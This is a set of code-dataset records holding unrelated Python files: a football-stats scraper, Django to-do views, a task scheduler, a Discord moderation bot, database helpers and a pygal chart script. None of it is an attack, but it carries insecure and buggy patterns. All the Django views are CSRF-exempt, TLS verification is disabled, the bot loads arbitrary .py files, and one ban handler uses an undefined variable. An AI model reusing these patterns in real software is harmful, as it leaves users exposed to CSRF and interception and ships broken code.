etree.HTML(res.text)\r\n xi = html.xpath('//section[@id=\"ended\"]//tbody/tr/td/a[@title=\"析\"]/@href')\r\n for x in xi:\r\n id = re.findall('/race/([\\s\\S]+)', x)[0]\r\n print(id)\r\n url = 'http://www.dszuqiu.com/race_ss/' + id\r\n response = self.session.get(url, headers=self.headers, timeout=30, verify=False)\r\n # random delay of a few seconds between requests\r\n time.sleep(random.randint(2,10))\r\n print('第二次请求:', response.status_code)\r\n dhtml = etree.HTML(response.text)\r\n try:\r\n # teams in this match\r\n qiudui = dhtml.xpath('//h3[@class=\"dsBreadcrumbs\"]/text()')[-1].strip()\r\n # odds trend\r\n zhishu = dhtml.xpath('//*[@id=\"race_part\"]/div[3]/div/table/tbody/tr/td[5]/a/text()')[0].strip()\r\n # corners: half-time / full-time\r\n jiao1 = dhtml.xpath('//*[@id=\"race_part\"]/div[3]/div/table/tbody/tr/td[1]/text()')[0].strip()\r\n jiao2 = dhtml.xpath('//*[@id=\"race_part\"]/div[3]/div/table/tbody/tr/td[2]/text()')[0].strip()\r\n jiaoquan = jiao1 + ' ' + jiao2\r\n # goals: half-time / full-time\r\n jin1 = dhtml.xpath('//*[@id=\"race_part\"]/div[3]/div/table/tbody/tr/td[3]/text()')[0].strip()\r\n jin2 = dhtml.xpath('//*[@id=\"race_part\"]/div[3]/div/table/tbody/tr/td[4]/text()')[0].strip()\r\n jinquan = jin1 + ' ' + jin2\r\n # goal distribution (home)\r\n try:\r\n jinzhu1 = dhtml.xpath(\r\n '/html/body/div/main/div/div/div/div[2]/div/div[1]/div[2]/div/div[1]/table/tbody/tr/td[1]/text()')[\r\n 0].strip()\r\n jinzhu2 = dhtml.xpath(\r\n '/html/body/div/main/div/div/div/div[2]/div/div[1]/div[2]/div/div[1]/table/tbody/tr/td[2]/text()')[\r\n 0].strip()\r\n jinzhu3 = dhtml.xpath(\r\n '/html/body/div/main/div/div/div/div[2]/div/div[1]/div[2]/div/div[1]/table/tbody/tr/td[3]/text()')[\r\n 0].strip()\r\n jinzhu4 = dhtml.xpath(\r\n '/html/body/div/main/div/div/div/div[2]/div/div[1]/div[2]/div/div[1]/table/tbody/tr/td[4]/text()')[\r\n 0].strip()\r\n jinzhu5 = dhtml.xpath(\r\n '/html/body/div/main/div/div/div/div[2]/div/div[1]/div[2]/div/div[1]/table/tbody/tr/td[5]/text()')[\r\n 0].strip()\r\n jinzhu6 = dhtml.xpath(\r\n '/html/body/div/main/div/div/div/div[2]/div/div[1]/div[2]/div/div[1]/table/tbody/tr/td[6]/text()')[\r\n 0].strip()\r\n jinzhu = jinzhu1 + ' ' + jinzhu2 + ' ' + jinzhu3 + ' ' + jinzhu4 + ' ' + jinzhu5 + ' ' + jinzhu6\r\n except:\r\n jinzhu = ''\r\n # goal distribution (away)\r\n try:\r\n jinke1 = dhtml.xpath(\r\n '/html/body/div/main/div/div/div/div[2]/div/div[1]/div[2]/div/div[2]/table/tbody/tr/td[1]/text()')[\r\n 0].strip()\r\n jinke2 = dhtml.xpath(\r\n '/html/body/div/main/div/div/div/div[2]/div/div[1]/div[2]/div/div[2]/table/tbody/tr/td[2]/text()')[\r\n 0].strip()\r\n jinke3 = dhtml.xpath(\r\n '/html/body/div/main/div/div/div/div[2]/div/div[1]/div[2]/div/div[2]/table/tbody/tr/td[3]/text()')[\r\n 0].strip()\r\n jinke4 = dhtml.xpath(\r\n '/html/body/div/main/div/div/div/div[2]/div/div[1]/div[2]/div/div[2]/table/tbody/tr/td[4]/text()')[\r\n 0].strip()\r\n jinke5 = dhtml.xpath(\r\n '/html/body/div/main/div/div/div/div[2]/div/div[1]/div[2]/div/div[2]/table/tbody/tr/td[5]/text()')[\r\n 0].strip()\r\n jinke6 = dhtml.xpath(\r\n '/html/body/div/main/div/div/div/div[2]/div/div[1]/div[2]/div/div[2]/table/tbody/tr/td[6]/text()')[\r\n 0].strip()\r\n jinke = jinke1 + ' ' + jinke2 + ' ' + jinke3 + ' ' + jinke4 + ' ' + jinke5 + ' ' + jinke6\r\n except:\r\n jinke = ''\r\n # home/away tab (default view of the history table)\r\n self.browser.get(url)\r\n fhtml = etree.HTML(self.browser.page_source)\r\n zhukezhu = fhtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[1]/td[3]/text()')[0].strip()\r\n zhukeke = fhtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[3]/td[3]/text()')[0].strip()\r\n zhukejsz = 
fhtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[1]/td[8]//text()')\r\n zhukejsz = ''.join(zhukejsz)\r\n zhukejsk = fhtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[3]/td[8]//text()')\r\n zhukejsk = ''.join(zhukejsk)\r\n zhukepz = fhtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[1]/td[6]//text()')\r\n zhukepz = ''.join(zhukepz)\r\n zhukepk = fhtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[3]/td[6]//text()')\r\n zhukepk = ''.join(zhukepk)\r\n zhukezs = fhtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[1]/td[7]//text()')\r\n zhukezs = ''.join(zhukezs)\r\n zhukeks = fhtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[3]/td[7]//text()')\r\n zhukeks = ''.join(zhukeks)\r\n # switch to the 'All' tab and re-read the history table\r\n self.browser.find_elements_by_xpath('//*[@id=\"tabid1\"]')[0].click()\r\n ghtml = etree.HTML(self.browser.page_source)\r\n quanjinzhu = ghtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[1]/td[3]/text()')[0].strip()\r\n quanjinke = ghtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[3]/td[3]/text()')[0].strip()\r\n quanshengjsz = ghtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[1]/td[8]//text()')\r\n quanshengjsz = ''.join(quanshengjsz)\r\n quanshengjsk = ghtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[3]/td[8]//text()')\r\n quanshengjsk = ''.join(quanshengjsk)\r\n quanyingpz = ghtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[1]/td[6]//text()')\r\n quanyingpz = ''.join(quanyingpz)\r\n quanyingpk = ghtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[3]/td[6]//text()')\r\n quanyingpk = ''.join(quanyingpk)\r\n quanzs = ghtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[1]/td[7]//text()')\r\n quanzs = ''.join(quanzs)\r\n quanks = ghtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[3]/td[7]//text()')\r\n quanks = ''.join(quanks)\r\n\r\n info = [url, qiudui + '\\t', zhishu + '\\t', jiaoquan + '\\t', jinquan + '\\t', jinzhu + '\\t',\r\n jinke + '\\t',\r\n zhukezhu + '\\t', zhukeke + '\\t', zhukejsz + '\\t', zhukejsk + '\\t', zhukepz + '\\t',\r\n zhukepk + '\\t', zhukezs + '\\t', zhukeks + '\\t',\r\n quanjinzhu + '\\t', quanjinke + '\\t', quanshengjsz + '\\t', quanshengjsk + '\\t',\r\n quanyingpz + '\\t', quanyingpk + '\\t', quanzs + '\\t', quanks + '\\t']\r\n print(info)\r\n name = f'DS比赛统计{lsID}'\r\n # write the header row once when the file is first created, then always append the data row\r\n if not os.path.exists(f'{name}.csv'):\r\n head = ['url', '比赛球队', '指数走势', '半角球全', '半进球全', '进球分布主', '进球分布客',\r\n '主客进球主', '主客进球客', '主客净胜主', '主客净胜客', '主客赢盘主', '主客赢盘客', '主客主胜', '主客客胜',\r\n '全进球主', '全进球客', '全净胜主', '全净胜客', '全赢盘主', '全赢盘客', '全主胜', '全客胜']\r\n csvFile = open(f'{name}.csv', 'a', newline='', encoding='utf-8-sig')\r\n writer = csv.writer(csvFile)\r\n writer.writerow(head)\r\n csvFile.close()\r\n csvFile = open(f'{name}.csv', 'a+', newline='', encoding='utf-8-sig')\r\n writer = csv.writer(csvFile)\r\n writer.writerow(info)\r\n csvFile.close()\r\n except:\r\n # skip races whose stats could not be parsed\r\n pass\r\n\r\nif __name__ == '__main__':\r\n lsID, start_page, end_page = map(int, input('请输入联赛id、爬取页数(多少页到多少页以空格分开):').split())\r\n lz = Dszuqiu()\r\n lz.biaodan(lsID, start_page, end_page)\r\n","sub_path":"endzuqiu.py","file_name":"endzuqiu.py","file_ext":"py","file_size_in_byte":16717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"557539553","text":"\"\"\"\nGiven an array of integers, \nfind the maximal absolute difference between \nany two of its adjacent elements.\n\nFor inputArray = [2, 4, 1, 0], the output should be\narrayMaximalAdjacentDifference(inputArray) = 3.\n\"\"\"\ndef arrayMaximalAdjacentDifference(inputArray):\n maxi = 
float(\"-inf\")\n for i in range(len(inputArray)-1):\n if abs(inputArray[i+1]-inputArray[i])> maxi:\n maxi = abs(inputArray[i+1]-inputArray[i])\n return maxi\n\ninputArray = [1,5,3,4]\nprint(arrayMaximalAdjacentDifference(inputArray))","sub_path":"CodeSignal/maxDiffAdjacent.py","file_name":"maxDiffAdjacent.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"384924417","text":"from django.shortcuts import redirect, render, get_object_or_404\nfrom django.views.decorators.csrf import csrf_exempt, csrf_protect\nfrom django.http import HttpResponse\n\nfrom .models import Task\nfrom .forms import TaskForm\n\n\n# Create your views here.\n\n\n\n@csrf_exempt\ndef add_task(request):\n\ttasks = Task.objects.all()\n\tif request.method == \"POST\":\n\t\tform = TaskForm(request.POST)\n\t\tif form.is_valid():\n\t\t\ttask = form.save(commit=False)\n\t\t\ttask.save()\n\t\t\ttask.update_from_db()\n\t\t\treturn redirect('details', pk=task.pk)\n\n\ttemplate = \"add.html\"\n\tform = TaskForm()\n\treturn render(request, template, {'form': form})\n\n@csrf_exempt\ndef task_details(request, pk):\n\ttasks = Task.objects.all()\n\ttemplate = \"details.html\"\n\ttask = get_object_or_404(Task, pk=pk)\n\treturn render(request, template, {'task':task})\n\n@csrf_exempt\ndef task_edit(request, pk):\n\ttasks = Task.objects.all()\n\ttemplate = \"edit.html\"\n\ttask = get_object_or_404(Task, pk=pk)\n\tif request.method == \"POST\":\n\t\tform = TaskForm(request.POST, instance=task)\n\t\tif form.is_valid():\n\t\t\ttask = form.save(commit=False)\n\t\t\ttask.save()\n\t\t\t\n\t\t\treturn redirect('manage')\n\telse:\n\t\tform = TaskForm(instance=task)\n\treturn render(request, template, {'form': form})\n\n@csrf_exempt\ndef task_delete(request, pk):\n\ttasks = Task.objects.all()\n\tif request.method == \"POST\":\n\t\ttask = get_object_or_404(Task, pk=pk).delete()\n\t\treturn redirect('manage')\n\telse:\n\t\treturn HttpResponse(\"WTF!\")\n\n\n@csrf_exempt\ndef manage(request):\n\ttasks = Task.objects.all()\n\ttemplate = \"manage.html\"\n\treturn render(request, template, {'tasks':tasks})\n\n@csrf_exempt\ndef index(request):\n\ttasks = Task.objects.all()\n\ttemplate = \"todos.html\"\n\treturn render(request, template, {'tasks':tasks})\n\n","sub_path":"morningApp/todos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"56941437","text":"\"\"\"\nSchedule tasks to run at a given time.\n\"\"\"\nimport threading\nimport time\nimport datetime as dt\n\nclass TaskNode:\n def __init__(self, value):\n self.next = None\n self.value = value\n pass\n\nclass Scheduler:\n def __init__(self):\n self.head = None\n self.active = False\n self.timer = None\n pass\n\n def add_task(self, time, action):\n '''Add a task to the task-chain.\n\n Args:\n time (datetime): When the task occurs.\n action (function): Function to run when `time` is reached.\n '''\n self._handle_terminated()\n task = TaskNode({\"time\": time, \"action\": action})\n head = self.head\n if head is None: # First task is being added\n self.head = task\n else:\n node = self.head\n while node:\n isHead = node == self.head\n notTail = node.next != None\n\n afterNode = time > node.value[\"time\"]\n if notTail:\n beforeNextNode = time < node.next.value[\"time\"]\n else:\n beforeNextNode = True # allow all times at the tail\n\n if afterNode and beforeNextNode: # Add task 
after current node\n task.next = node.next\n node.next = task\n break\n elif isHead and not afterNode: # Add task before current node (head)\n task.next = node\n self.head = task\n node = node.next\n \n if task == self.head:\n # Timer needs to be changed\n if self.timer and self.active:\n self.timer.cancel()\n self._wait_for_head()\n\n def _wrap_action(self, action):\n def wrapped():\n action()\n # Forget completed task\n self.head = self.head.next\n if self.active:\n self._wait_for_head()\n return wrapped\n\n def _wait_for_head(self):\n task = self.head\n if task:\n interval = (task.value[\"time\"] - dt.datetime.now()).total_seconds()\n # NOTE: Negative intervals execute instantly and are allowed in threading.Timer()\n self.timer = threading.Timer(interval, self._wrap_action(task.value[\"action\"]))\n self.timer.start()\n\n def start(self, auto_stop=False):\n '''Start the scheduler.\n\n Args:\n auto_stop(bool): Whether the scheduler should stop when no tasks are scheduled.\n '''\n self._handle_terminated()\n self.resume()\n if auto_stop is False:\n # Add daemon to keep scheduler alive; it must be started or it does nothing\n self.daemon = threading.Timer(1 * 24 * 60 * 60, lambda: print(\"Exiting\"))\n self.daemon.start()\n\n def terminate(self):\n '''Stop the scheduler.\n\n Detaches the head and marks scheduler as terminated.\n '''\n self._handle_terminated()\n self.pause()\n # the daemon only exists if start() was called without auto_stop\n if hasattr(self, 'daemon'):\n self.daemon.cancel()\n self.active = \"TERMINATED\"\n\n def _handle_terminated(self):\n if self.active == \"TERMINATED\":\n raise Exception(\"Can not use terminated scheduler.\")\n\n def pause(self, timeToLast=-1):\n '''Pause the scheduler.\n\n Args:\n timeToLast(float, optional): Number of seconds to pause the scheduler for.\n\n Note that the scheduler's activity is reverted, not toggled.\n '''\n self._handle_terminated()\n self.active = False\n if timeToLast>=0:\n if self.timer:\n self.timer.cancel()\n # the timer must be started, otherwise it never fires\n resume_timer = threading.Timer(timeToLast, lambda: self.resume())\n resume_timer.start()\n \n def resume(self, timeToLast=-1):\n '''Resume the scheduler.\n\n Args:\n timeToLast(float, optional): Number of seconds to resume the scheduler for.\n \n Note that the scheduler's activity is reverted, not toggled.\n '''\n self._handle_terminated()\n self.active = True\n self._wait_for_head()\n if timeToLast>=0:\n # the timer must be started, otherwise it never fires\n pause_timer = threading.Timer(timeToLast, lambda: self.pause())\n pause_timer.start()","sub_path":"src/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"614938389","text":"import discord\nfrom discord.ext import commands\nfrom discord.utils import get\nimport logging\nimport os\nimport asyncio\nfrom itertools import cycle\nimport youtube_dl\nimport shutil\nplayers={}\n\n#Add token.txt to the working directory with your Bot Token\n#Add youtube_api.txt with your API key\n\nf = open('token.txt', 'r')\nTOKEN = f.read().replace('\\n', '')\nlogger = logging.getLogger('discord')\nlogger.setLevel(logging.DEBUG)\nhandler = logging.FileHandler(filename='discord.log', encoding='utf-8', mode='w')\nhandler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))\nlogger.addHandler(handler)\nclient = commands.Bot(command_prefix=\"!\")\nclient.remove_command('help')\n\n@client.event\nasync def on_ready():\n print('We have logged in as {0.user}'.format(client))\n@client.event\nasync def on_member_join(member):\n\trole=discord.utils.get(member.guild.roles,name=\"Hero\")\n\tawait member.add_roles(role)\n@client.command()\nasync def ping(message):\n\tawait 
message.channel.send(\"Pong!\")\n@client.command()\nasync def clean(ctx,amount=100):\n\tmessages=[]\n\tchannel=ctx.channel\n\tasync for message in channel.history(limit=int(amount)):\n\t\tmessages.append(message)\n\tawait channel.delete_messages(messages)\n\tawait channel.send('Messages Deleted!')\n@client.command()\nasync def help(ctx):\n\tauthor=ctx.author\n\tembed=discord.Embed(\n\tdescription=\"Here's some help\",\n\tcolour=discord.Colour.blue()\n\t)\n\tembed.set_author(name='help')\n\tembed.add_field(name=\"!ping \",value=\"Returns pong\",inline=False)\n\tembed.add_field(name=\"!clean \",value=\"Clean messages Usage:!clean no._of_messages,default-100\",inline=False)\n\tembed.add_field(name=\"!play\",value=\"Play with !play songname \",inline=False)\n\tembed.add_field(name=\"!pause\",value=\"pauses the music\",inline=False)\n\tembed.add_field(name=\"!resume\",value=\"resumes the music\",inline=False)\n\tembed.add_field(name=\"!stop\",value=\"stops the music\",inline=False)\n\tembed.add_field(name=\"!next\",value=\"Plays next song in queue.\",inline=False)\n\tembed.add_field(name=\"!queue\",value=\"Queues a song. Use !queue Song_name\",inline=False)\n\tembed.add_field(name=\"!kick\",value=\"Kicks a member. Use !kick member_name\",inline=False)\n\tembed.add_field(name=\"!ban\",value=\"Bans a member. Use !ban member_name\",inline=False)\n\tembed.add_field(name=\"!unban\",value=\"Unbans a member. Use !unban member_name(with discriminator) Eg:Nishant#4324\",inline=False)\n\n\tawait ctx.channel.send(author,embed=embed)\n@client.event\nasync def on_reaction_add(reaction,user):\n\tchannel=reaction.message.channel\n\tawait channel.send('{} has added {} to the message {}'.format(user.name,reaction.emoji,reaction.message.content))\n@client.command()\n@commands.has_role('admin')\nasync def kick(ctx,member: discord.Member,*,reason=\"none\"):\n\tawait member.kick(reason=reason)\n\tawait ctx.send(f\"Kicked! {member.mention}\")\n@client.command()\n@commands.has_role('admin')\nasync def ban(ctx,member : discord.Member,*,reason=\"none\"):\n\tawait member.ban(reason=reason)\n\tawait ctx.send(f\"Banned! 
{user.mention}\")\n@client.command()\n@commands.has_role('admin')\n#we need user#123 member format as they are not in server\nasync def unban(ctx,*,member): \t\t\t\t\t\t\n\tbanned_users= await ctx.guild.bans()\n\tmember_name,member_discriminator=member.split('#')\n\tfor ban_entry in banned_users:\n\t\tuser=ban_entry.user\n\t\tif(user.name,user.discriminator)==(member_name,member_discriminator):\n\t\t\tawait ctx.guild.unban(user)\n\t\t\tawait ctx.send(f\"Unbanned {user.mention}\")\n\t\t\treturn\n#load the cogs in the working directory\nfor filename in os.listdir(\"./\"):\n\tif filename.endswith(\".py\") and filename!=\"bot.py\":\n\t\tclient.load_extension(f\"{filename[:-3]}\")\nclient.run(TOKEN)","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"44500950","text":"import os\n# from uniback.dictionary.uniback_constants import Repository as Rep\nfrom uniback.models.general import Repository\nfrom uniback.tools.local_session import LocalSession\n\n\ndef init_repository(engine, name):\n with LocalSession() as session:\n pass \n \n\ndef add_repository(info):\n with LocalSession() as session:\n repository = Repository(\n name=info['name'],\n description=info.get('description'),\n data=info['data'],\n engine=info['engine'],\n physical_location_id=info['physical_location_id']\n )\n session.add(repository)\n session.commit()\n\n\ndef delete_repositories(ids):\n with LocalSession() as session:\n for id in ids:\n session.query(Repository).filter_by(id=id).delete()\n session.commit()\n\n\ndef get_engine_repositories(engine_name):\n repository_list = []\n with LocalSession() as session:\n repositories = session.query(Repository).filter_by(engine=engine_name)\n for repository in repositories:\n repository_list.append((repository.id, repository.name))\n return repository_list\n\n\ndef get_info(id):\n info_dict = {}\n with LocalSession() as session:\n repository = session.query(Repository).filter_by(id=id).first()\n info_dict = dict(\n name=repository.name,\n description=repository.description,\n data=repository.data,\n engine=repository.engine,\n physical_location_id=repository.physical_location_id,\n physical_location_name=repository.physical_location.name\n )\n return info_dict","sub_path":"uniback/db_interfaces/repository_list.py","file_name":"repository_list.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"513017693","text":"# 나이브 어쩌구로 구현할거임\nimport math\nimport re\n\nTEST_MODE_OFF = True # =False 하면 ./ratings_vaid.txt랑 비교대조하면서 정답률 체크함\nTEST_NAME = \"T07\" # 디버그모드에서 만들어내는 결과파일 이름 앞에 붙음.\n\nTAIL_DIC = [ # 제거할 Tail 목록\n '\\t','.', '!', ',', \"'\", '\"', '의', '이', '가', '이다','다', '를', '의', '들'\n '같은', '은', '는', '한', '진', '임', '하고', '고', '적', '인', '~', 'ㅋ'\n ] \n\ndef TailRemover(word):\n \n for tail in TAIL_DIC:\n is_tail = word[-len(tail) : ]\n if is_tail == tail and len(word) != len(tail):\n return TailRemover(word[ : -len(tail)])\n\n return word\n\ndef NownSpliter(message): # 개선필요\n ret = []\n split = message.split(\" \")\n for word in split :\n word = TailRemover(word)\n if len(word) != 0:\n ret.append(word)\n return ret\n\n# AI의 베이스가 될 도수분포표가 필요.\nclass NaiveBaisian:\n dataList = {}\n \n def __init__(self):\n self.typeCount = 1\n self.dictionary = {}\n return\n\n def DefineRating(rating):\n data = NaiveBaisian()\n NaiveBaisian.dataList[rating] = data\n return\n \n def 
InsertData(rating, message):\n data = NaiveBaisian.dataList[rating]\n data.typeCount += 1\n for word in NownSpliter(message):\n if word in data.dictionary :\n data.dictionary[word] += 1\n else :\n data.dictionary[word] = 1\n return\n\n def IsNeverWord(word):\n for ratingData in NaiveBaisian.dataList.values():\n if word in ratingData.dictionary :\n return False\n return True\n\n def LogProbablityWord(self, word):\n if word in self.dictionary:\n return math.log(self.dictionary[word]) - math.log(self.typeCount)\n else :\n #if NaiveBaisian.IsNeverWord(word) : # if this word was never seen under any rating,\n # return 0 # T02: this word does not affect the classification.\n # return math.log(self.typeCount) # T05: split according to the original class ratio.\n # for rating in NaiveBaisian.dataList.keys() :\n # if self.typeCount < NaiveBaisian.dataList[rating].typeCount :\n # return -0.000000000000001\n # return +0.000000000000001\n\n return math.log( 0.4 ) - math.log(self.typeCount) # penalize this class when the other class has the word.\n # T02 & T05 not applied / when neither class has the word, this effectively favors the rating with less collected data.\n \n\n def LogProbablityMessage(rating, message):\n data = NaiveBaisian.dataList[rating]\n ret = 0\n for word in NownSpliter(message):\n ret += data.LogProbablityWord(word)\n return ret\n\n def FindBestRatingFor(message):\n rating_best= -1\n value_best = - math.inf\n for rating in NaiveBaisian.dataList.keys() :\n value = NaiveBaisian.LogProbablityMessage(rating, message)\n if value_best < value :\n value_best = value\n rating_best = rating\n return rating_best\n\n def DebugGetDiff(message):\n return NaiveBaisian.LogProbablityMessage(0,message) - NaiveBaisian.LogProbablityMessage(1,message)\n\n\ndef floatForm(f):\n if f >= 0 :\n return \"+%.5f\" % f\n else :\n return \"%.5f\" % f\n\ndef main():\n NaiveBaisian.DefineRating(0)\n NaiveBaisian.DefineRating(1)\n print(\"Train data from ./ratings_train.txt\")\n ##==============================================================##\n ## TRAINING ##\n ##==============================================================##\n file = open('ratings_train.txt', 'r', encoding='UTF8')\n lines = file.readlines()\n del lines[0] # drop the header line\n count = 0\n for data in lines:\n rating = int(data[-2:-1])\n data = data.partition('\\t')[2][:-3] # strip the leading id, plus the trailing tab, rating and newline\n NaiveBaisian.InsertData(rating, data)\n\n count += 1\n if count % 30000 == 0:\n print(\"training... \" + str(count))\n\n file.close()\n \n\n\n ##==============================================================##\n ## ACTION ##\n ##==============================================================## \n if TEST_MODE_OFF :\n print(\"Get problems from ./ratings_test.txt to Write result on ./ratings_result.txt\")\n\n fread = open('ratings_test.txt' , 'r', encoding='UTF8')\n fwrite = open('ratings_result.txt', 'w', encoding='UTF8')\n \n lines = fread.readlines()\n write_msg = lines[0]\n del lines[0] # drop the header line\n for data in lines:\n id = data.partition('\\t')[0]\n data = data.partition('\\t')[2][:-2] # strip the leading id and the trailing rating\n \n rated = NaiveBaisian.FindBestRatingFor(data)\n write_msg += (id + \"\\t\" + data + \"\\t\" + str(rated) + \"\\n\")\n\n \n fwrite.write(write_msg)\n fwrite.close()\n fread.close()\n \n print(\"Classification finished. 
result saved\")\n\n return\n ##==============================================================##\n ## ACTION for TEST ##\n ## (DISABLED) ##\n ##==============================================================## \n\n print(\"Get problems from ./ratings_valid.txt to get accuracy\")\n\n success = 0;\n fail = 0;\n failed_messages = \"\"\n file = open('ratings_valid.txt', 'r', encoding='UTF8')\n lines = file.readlines()\n del lines[0] # 첫줄 제거\n for data in lines:\n rating = int(data[-2:-1])\n data = data.partition('\\t')[2][:-2] # 처음에 나오는 id 제거, 맨 뒤의 rating 제거\n \n rated = NaiveBaisian.FindBestRatingFor(data)\n if rating == rated :\n success += 1\n elif rating + rated == 1 :\n fail += 1\n\n gap = NaiveBaisian.DebugGetDiff(data)\n failed = str(1-rating) + \" \" + floatForm(gap) + \" \" + data + \"\\n\"\n failed_messages += failed\n \n\n file.close()\n\n total = success + fail\n print(TEST_NAME + \" TEST RESULT ----------------\")\n print(\"total : \" + str(total))\n print(\"success : \" + str(success) + \"\\t\" + str(100*success/total) + \"%\")\n\n\n\n \n ##==============================================================##\n ## PUT FAILED MESSAGE & LEARNING DATA ON FILE ##\n ##==============================================================##\n file = open(TEST_NAME + \"_Fail\" + str(fail) + \".txt\", 'w', encoding='UTF8')\n file.write(\"fail 비율 : \" + str(100 * fail/total) + \"%\\n\")\n for tail in TAIL_DIC :\n file.write( tail + \", \")\n file.write(\"\\n\")\n file.write(failed_messages)\n file.close()\n\n for rating in range(2) :\n writeStr = \"rate\" + str(rating) + \" 총 input:\" + str( NaiveBaisian.dataList[rating].typeCount )+ \"\\n\"\n dic = NaiveBaisian.dataList[rating].dictionary\n sorted_by_value = reversed(sorted(dic.items(), key=lambda kv: kv[1])) ## 이거 뭔코든지 나도 몰라양. 
It sorts the entries by frequency, most common first!\n\n\n for tuple in sorted_by_value :\n writeStr += str(tuple[1]) + \"\\t\" + str(tuple[0]) +\"\\n\" # occurrence count + word\n\n file = open(TEST_NAME + \"_DicRate\" + str(rating) + \".txt\", 'w', encoding='UTF8')\n file.write(writeStr)\n file.close()\n \nmain()\n\n\n\n\n\n\n\n","sub_path":"과목별학교과제/Algorithm/3_2_NaiveBasianClassifier/NaiveBasian.py","file_name":"NaiveBasian.py","file_ext":"py","file_size_in_byte":8165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"436127140","text":"from django.shortcuts import HttpResponse\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.core.exceptions import ValidationError\n\nfrom publications.models import Publication\nfrom publications.utils import json_response\nfrom publications import constants\n\n@csrf_protect\ndef get_publications(request):\n '''\n args:\n page is required\n fromDate is not required\n toDate is not required\n request example:\n http://127.0.0.1:8000/publications/get_publications/?page=1&fromDate=2017-06-18\n '''\n\n page_number = request.GET.get('page')\n fromDate = request.GET.get('fromDate')\n toDate = request.GET.get('toDate')\n\n if not page_number:\n return json_response({ 'error': 'You must pass page number as an argument' })\n\n publications = Publication.objects.all()\n\n if fromDate:\n try:\n publications = publications.filter(date__gte=fromDate)\n except ValidationError as error:\n return json_response({ 'error': str(error) })\n\n if toDate:\n try:\n publications = publications.filter(date__lte=toDate)\n except ValidationError as error:\n return json_response({ 'error': str(error) })\n\n\n start = (int(page_number) - 1) * constants.PAGE_SIZE\n end = int(page_number) * constants.PAGE_SIZE\n\n context = {\n 'publications': list(publications.values('title', 'content', 'date'))[start:end]\n }\n\n\n return json_response(context)\n","sub_path":"publications/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"376986667","text":"import csv\n\nimport help_functions as hp\nfrom country_codes import get_country_code\n\nfrom pygal.maps.world import World\nfrom pygal.style import LightColorizedStyle as LCS , RotateStyle as RS\n\nfilename = input(\"Enter the name of csv data file: \")\nyear = input(\"Enter the year from which you want your data to be processed: \")\ndata_dict = {}\ntry:\n with open('data/' + filename) as file:\n reader = csv.reader(file)\n index = hp.find_year(reader, year)\n for row in reader:\n country_name = row[0]\n death_rate = row[index]\n country_code = get_country_code(country_name)\n if country_code and death_rate:\n data_dict[country_code] = int(float(death_rate)) \nexcept FileNotFoundError:\n print(\"ERROR incorrect file name : \" + filename)\n \n#DIVISION INTO THREE GROUPS \nlow, average, high = {}, {}, {}\nfor country, deaths in data_dict.items():\n if deaths < 10:\n low[country] = deaths\n if deaths >= 10 and deaths < 20:\n average[country] = deaths\n if deaths >= 20:\n high[country] = deaths\n \n#CREATING CHART\nwm_style = RS('#cd823f', base_style=LCS)\nwm = World(style = wm_style)\nwm.force_uri_protocol = 'http'\nwm.title = 'Death rate per 1000 people in ' + year\nwm.add(\"Less than 10 people\", low)\nwm.add(\"More than 10 people and less than 20\", average)\nwm.add(\"20 and more\", high)\nsave_filename = input(\"Enter new name of the chart: \")\nwm.render_to_file('output/' + 
save_filename)\n","sub_path":"death_rate_world.py","file_name":"death_rate_world.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"650684335","text":"import datetime\r\nimport os\r\nimport time\r\nimport logging\r\n\r\nfrom bots import *\r\nfrom service import UsersService, ClipsService\r\nfrom type import PublishTo\r\nfrom api import YoutubeApi\r\n\r\nif os.getenv(\"env\") != \"prod\":\r\n logger = logging.getLogger('peewee')\r\n logger.addHandler(logging.StreamHandler())\r\n logger.setLevel(logging.DEBUG)\r\n\r\n# TODO: 非同期で一度にAPIを叩く回数。一瞬で5回APIを叩くことになるが、これが多いのか少ないのか。相手への負荷はどれくらいなのか...\r\nMAX_WORKERS = 5\r\nTIME_SLEEP = 2\r\nTIMING = 30\r\n\r\n\r\nuser_service = UsersService()\r\nclip_service = ClipsService()\r\n\r\n\r\ndef job(datum):\r\n \"\"\"APIを叩き、通知を送信する\"\"\"\r\n youtube = YoutubeApi()\r\n clips = None\r\n try:\r\n clips = youtube.search(datum)\r\n except Exception as e:\r\n print(e)\r\n\r\n if clips:\r\n data_source = to_clips_model(clips, 